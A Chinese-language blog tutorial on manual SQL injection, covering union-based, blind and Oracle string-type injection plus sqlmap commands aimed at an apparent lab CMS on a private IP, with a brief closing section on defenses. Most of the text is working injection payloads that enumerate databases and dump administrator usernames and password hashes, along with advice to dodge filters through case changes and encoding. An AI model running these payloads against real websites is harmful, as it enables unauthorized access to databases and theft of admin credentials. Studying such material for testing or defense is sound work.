sql高级手工注入
非常重要:首先在网站找到管理入口,否则,呵呵就算有用户名和密码,找不到入口,也是白玩。。
注入时,注意通过改变大小写、编码、转换等方式躲过系统检查,顺利执行语句!!!
(一)数字型注入
正常步骤:
1、 判断注入点
在 URL 后加’判断是否存在注入点,数据库报错。
2、 判断字段长度:
利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,
也就是最后一个正常页面返回。
3、 判断字段位置回显:
利用
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
最后一个数为字段长度,有回显会将相应数字显示出来。假如,3 和 11 显示在页面上了,
即可利用3位置和11位置,显示有用的信息。
4、 判断数据库信息:
利用
and 1=2 union select 1,2,sql_command, 4,5,6,7,8,9,10,11,12, 13,14,15;
用 sql 指令替换 sql_command。
Sql_command为以下参数:
查看 mysql 版本 version()
查看当前数据库 database()
查看当前用户 user()
5、 判断 mysql 所有数据库:
利用
and 1=2 union select 1,2,group_concat(convert (SCHEMA_NAME using latin1)),
4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.SCHEMATA
查看 mysql中所有数据库的名称。可知业务数据库为 cms。
6、 判断数据库表:
利用
and 1=2 union select 1,2,group_concat(conver t(table_name using latin1)),4,5,6,7,8,9,
10,11,12,13,14,15 from information_schema.tables where table_schema=database()
查看 cms 数据库拥有的所有表。可以发现存放用户信息的表cms_users。
7、 判断数据表的所有列:
利用
and 1=2 union select 1,2,group_concat(convert(column_name using latin1)),4,5,6,7,8,9,10,
11,12,13,14,15 from information_schema.columns where table_name=0x636D735F7573
table_name=cms_users
表名需要编码为 16 进制。得到 3 个列:userid,username 和 password
8、 判断管理员账号密码:
利用
and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,
11,12,13,14,15 from cms.cms_users。
得到管理员账号密码为:admin/e10adc3949ba59abbe56e057f20f883e(解密后123456)
9、 登陆后台地址。SQL注入结束。
使用SQLmap注入
判断注入点—>注入类型—>注入数据库—>获取当前数据库—>获取当前数据库中的表格—>获取当前数据库中表格中的关键字段—>获取字段内的内容。
注入结束,获取到cms_users中的userid,username 和 password的内容信息。
盲注
猜表名和用户名密码
第一步-猜表名
and (select count(*) from 表名) >=0
例如 and (select count(*) from admin) >=0 网页返回正常 说明存在admin这个表,返回不正常,接着猜
第二步-猜字段
and (select count(字段名) from猜到的表名)>=0
例如 and (select count (user) from admin ) >=0 网页返回正常 说明存在user这个字段,不正常,继续
第三步-猜字段的位数
and (select top 1 len (字段名) from 表名) >0
例如 and (select top 1 len (user) from admin) >N 返回正常 >N+1 返回错误,即该字段为N+1位了。
第四步 猜字段的Ascii码值
and (select top 1 asc (mid (字段,位数,1)) from 表名) >ascii(1~128)
例如 and (select top 1asc (mid (user,1,1)) from admin) >96 返回正常 97返回错误
那么这个user表里面的第一个ascii码就是97了 ascii码对应的就是字母a
user字段里面的第一位已经被猜出来了 是a 对应的ascii码是97
接着猜第二位
and (select top 1asc (mid (user,2,1)) from admin) >99 返回正常 100返回错误 ascii码为100
100对应的是字母d
接着猜第三位
and (select top 1asc (mid (user,3,1)) from admin) >108 返回正常 109 返回错误 ascii码为109
109对应的是字母m
接着猜第四位
and (select top 1asc (mid (user,4,1)) from admin) >104 返回正常 105返回错误 ascii码是105
105对应的是字母i
接着猜第五位
and (select top 1asc (mid (user,5,1)) from admin) >109 返回正常 110返回错误 ascii码为110
110对应的字母是n
Ascii:97 100 109 105 110
对应的字母 :a d m i n
第五步 猜解pwd字段
and (select top 1 len (pwd) from 表名) >N
user字段猜完了开始猜pwd字段也就是网站后台的密码
and (select top 1 asc (mid (pwd,1,1)) from admin) >ascii(1—128)
and (select top 1 asc (mid (pwd,N,1)) from admin) >ascii(1—128)
和猜user字段里的内容是一样的,把字段替换成pwd ,然后在猜的时候替换要猜解的位数和ascii码。
猜出了用户名和密码的散列值(明文),即可反查密码了。
(二)字符型注入
1、在url后面加’报错
接着用 ' and '1'='1,' and '1'='2判断页面,或者' and 1=1--,' and 1=2--
2、判断数据库类型
利用oracle的系统表,user_tables
' and (select count (*) from user_tables>0
3、获取字段数
' order by 1--,通过变换值,当为9时返回空页面。
4、利用 union select 判断注入类型
' union select null,null,null,null,null,null,null,null from user_tables order by 1 desc,
给null加 ' ',确定为数字型还是字符型,通过判断1,2,7,8 为数值型,3,4,5 为字符型,6 为其他类型(时间类型)。
5、判断各字段在页面中的显示位置
' union select 1,2,'3','4','5',null,7,1 from user_tables order by 1 desc --
在页面显示3、5。
6、其他
' and (select count(*) from user_tables)=5--
//可以得知user_tables中含有5张表,可以用大小于号判断。
' and 1=2 union select 1,2,table_name,'4','5',null,7,1 from user_tables
// 获取数据表名
' and (select count(*) from xblouser) >0 ,
//当大于1为假时,确定该表只有1个账号。
' and (SELECT count(*) FROM USER_TAB_COLUMNS WHERE
table_name='XBLOUSER' )>0
// 列举字段数,发现大于3为假,证明字段数为2。
' and 1=2 union select 1,2,COLUMN_NAME,'4','5',null,7,1 from (select * from (SELECT
COLUMN_NAME FROM USER_TAB_COLUMNS WHERE table_name='XBLOUSER' order by 1 asc )
WHERE ROWNUM<=3 ORDER BY 1 DESC) WHERE ROWNUM<=1 --
' and 1=2 union select 1,2,XBLOUSERNAME,'4',xblopassword,null,7,1 from XBLOUSER
//获取管理员用户名和密码信息
(三)利用SqlMap注入
1.访问:http://IP 任意点击一条文章得到连接地址
2.在命令行中,输入
sqlmap.py –u http://IP/cms/show.php?id=33 //会输出MySql的注入点信息。
3.在命令行中,输入
sqlmap.py –u http://IP/cms/show.php?id=33 --dbs //输出MySql中的数据库名称
sqlmap.py –u http://IP/cms/show.php?id=33 -–tables –D “cms_users” //输出cms的列名称
sqlmap.py -u http://192.168.16.181/cms/show.php?id=33 --columns -T "cms_users" -D "cms"
//输出表的列名称
4.在命令行中,输入
sqlmap.py -u http://192.168.16.181/cms/show.php?id=33 --dump -C "password,userid,username" -T "cms_users" -D "cms" //对cms库中的表cms_users中的所有列进行破解
sqlmap.py –u http://IP/cms/show.php?id=33 --dump –D “cms” //输出MySql中所有数据库的名称及其相关信息,并且会对管理员账户进行破解尝试。
(四)SQL注入的防护
1、数据库禁止远程访问
(1)将phpMyAdmin设置为禁止远程访问
<Directory "D:/.../phpmyadmin3.4.10.1/">
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Order Deny,Allow
Deny from all
Allow from 127.0.0.1 //指定仅允许本机访问
</Directory>
(2)设置数据库禁止远程访问(有些版本不支持)
use mysql;
update user set host = "localhost" where user = "root" and host = "%"; //仅允许root本机登录
update user set host = "localhost" where user = "%"; //不允许任何用户远程登录
flush privileges; //配置立即生效
2、安装网站防护安全狗
安装完毕,并设置好相关的参数,运行之后,即可在右下角托盘中看到运行中的安全狗。在安全狗图标上点击右键,即可看到有网站安全防护功能。
3、其他方法
1、限制访客权限,过滤union、and等敏感命令;
2、参数化查询;
3、变异语句的发现;利用/*XXX*/代替空格,定义无用变量等
4、白名单机制。
sql高级手工注入的更多相关文章
- sql server手工注入
sql server手工注入 测试网站testasp.vulnweb.com 1. http://testasp.vulnweb.com/showforum.asp?id=0 http://testa ...
- (后端)sql手工注入语句&SQL手工注入大全(转)
转自脚本之家: 看看下面的1.判断是否有注入;and 1=1;and 1=2 2.初步判断是否是mssql;and user>0 3.判断数据库系统;and (select count(*) f ...
- 最新SQL手工注入语句&SQL注入大全
看看下面的1.判断是否有注入;and 1=1;and 1=2 2.初步判断是否是mssql;and user>0 3.判断数据库系统;and (select count(*) from syso ...
- 一次简单的SQL手工注入
1. 首先要了解SQL注入的原理: SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 具体来说,它是利 ...
- 小白日记41:kali渗透测试之Web渗透-SQL手工注入(三)-猜测列名、表名、库名、字段内容,数据库写入
SQL手工注入 靶机:metasploitable(低) 1.当无权读取infomation_schema库[MySQL最重要的源数据库,必须有root权限]/拒绝union.order by语句 ...
- 小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell
SQL手工注入 1.读取文件[load_file函数] ' union SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' unio ...
- 小白日记39:kali渗透测试之Web渗透-SQL手工注入(一)-检测方法
SQL手工注入(一) SQL注入:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.[SQL注入原理] ##服务端程序将用户输入参数作为查询 ...
- Kali学习笔记42:SQL手工注入(4)
前三篇文章都是在讲发现SQL注入漏洞 如何查询得到所有的信息 那么另一条思路还未尝试过:能否修改数据? 例如这样: '; update users set user='yiqing' where us ...
- python辅助sql手工注入猜解数据库案例分析
发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...
随机推荐
- Hyperledger Fabric 2.x 自定义智能合约
一.说明 为了持续地进行信息的更新,以及对账本进行管理(写入交易,进行查询等),区块链网络引入了智能合约来实现对账本的访问和控制:智能合约在 Fabric 中称之为 链码,是区块链应用的业务逻辑. 本 ...
- etcd受损节点重新加入集群
文章目录 查看当前集群状态 删除受损etcd节点的数据 数据受损节点重新加入集群 修改etcd启动参数,重启etcd 由于自己的误操作,将A节点的etcd备份数据复制到B节点的etcd备份节点目录下, ...
- 提高可测性-Mock平台设计和整体规划
微信搜索[大奇测试开],关注这个坚持分享测试开发干货的家伙. 平台背景 从业务特性上,不少测试的服务很多是依赖第三方的接口的,比如其中的支付场景,就需要很多状态的返回进行验证,但大部分服务提供商没有很 ...
- python-利用random模块生成测试数据封装方法总结
1.前言: 在测试中经常有需要用到参数化,我们可以用random模块,faker模块生成测试数据,也可以用到pymysql,此文主要针对random模块生成任意个数的随机整数,随机字符串,随机手机号, ...
- NSSCTF-[鹤城杯 2021]A_MISC
下载压缩包,解压需要输入密码,使用winhex打开发现不是zip的伪加密,然后使用爆破工具进行爆破得到密码 解压压缩包获得一个png打开是一个URL,常用的都知道,百度网盘的文件分享的链接,复制打开U ...
- TestNG基本使用
TestNG简介 Testng是一套开源测试框架,是从Junit继承而来,testng意为test next generation 创建maven项目,添加依赖 <dependency> ...
- 如何利用Smartbi做数据分析:车企销量排名TOP10的车型
下面我们来对比一下去年和今年的销量.同比增长情况: 图1. 轿车销量月趋势 图2. SUV销量月趋势 不难看出2月.7月为两个销量低点,而7月销量受天气影响较大,烈日.高温,毫无看车热情,复杂多变的外 ...
- QT:QT Creator下载安装
学习自: QtCreator5.12.6安装图文教程 - 知乎 (7条消息) Qt Creator下载安装_芒种.的博客-CSDN博客 (7条消息) QT5.11下载与安装教程_杨书航的博客-CSDN ...
- SAPD:FSAF升级版,合理的损失值加权以及金字塔特征选择 | ECCV 2020
针对anchor-point检测算法的优化问题,论文提出了SAPD方法,对不同位置的anchor point使用不同的损失权重,并且对不同的特征金字塔层进行加权共同训练,去除了大部分人为制定的规则,更 ...
- .NetCore Web Api 利用ActionFilterAttribute统一接口返回值格式
.Net Core 同 Asp.Net MVC一样有几种过滤器,这里不再赘述每个过滤器的执行顺序与作用. 在实际项目开发过程中,统一API返回值格式对前端或第三方调用将是非常必要的,在.NetCore ...